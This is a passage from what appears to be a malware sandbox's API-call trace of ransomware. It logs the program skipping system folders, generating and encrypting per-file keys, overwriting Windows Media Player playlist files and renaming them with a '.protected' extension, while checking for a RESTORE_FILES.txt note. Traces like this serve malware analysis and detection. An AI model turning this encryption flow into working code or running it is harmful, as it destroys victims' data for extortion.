(lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".zip") returned 0x0 [0093.921] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0093.945] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.945] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0093.945] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.946] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.946] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.946] CloseHandle (hObject=0x158) returned 1 [0093.946] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected") returned 132 [0093.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), 
lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.protected")) returned 1 [0093.948] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Windows") returned -1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0093.948] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0093.948] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.948] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0093.948] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: 
"c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.950] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.950] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0093.950] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.950] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0093.950] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0093.950] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0093.950] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0093.956] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.956] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0093.956] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.956] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.956] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.956] CloseHandle (hObject=0x158) returned 1 [0093.957] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected") returned 134 [0093.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.protected")) returned 1 [0093.958] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0093.958] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="System Volume 
Information") returned -1 [0093.958] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.958] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0093.958] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.959] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.959] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0093.959] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0093.959] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0093.959] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") 
returned 122 [0093.959] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0093.959] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0093.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.968] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0093.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.968] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.968] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.968] CloseHandle (hObject=0x158) returned 1 [0093.968] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected") returned 132 [0093.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), 
lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0093.969] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Windows") returned -1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0093.969] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0093.970] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0093.970] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.970] StrStrIW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0093.970] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: 
"c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.971] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0093.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.971] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0093.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0093.971] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0093.971] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0093.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.977] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0093.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.977] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0093.978] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0093.978] CloseHandle (hObject=0x158) returned 1 [0093.978] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected") returned 135 [0093.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.protected")) returned 1 [0093.979] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Windows") returned -1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0093.979] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0093.979] lstrcmpiW 
(lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0093.979] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.979] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0093.979] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0093.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0093.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0093.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0093.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.980] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0093.980] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.980] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0093.980] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0093.980] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0093.980] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.007] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0094.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.007] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.007] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.007] CloseHandle (hObject=0x158) returned 1 [0094.007] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected") returned 137 [0094.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.protected")) returned 1 [0094.058] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0094.058] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0094.058] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.058] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0094.058] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.058] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.058] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) 
returned 1 [0094.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.059] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.059] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0094.059] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.059] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0094.059] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0094.059] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0094.059] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0094.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.066] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0094.066] SetFilePointerEx (in: hFile=0x158, 
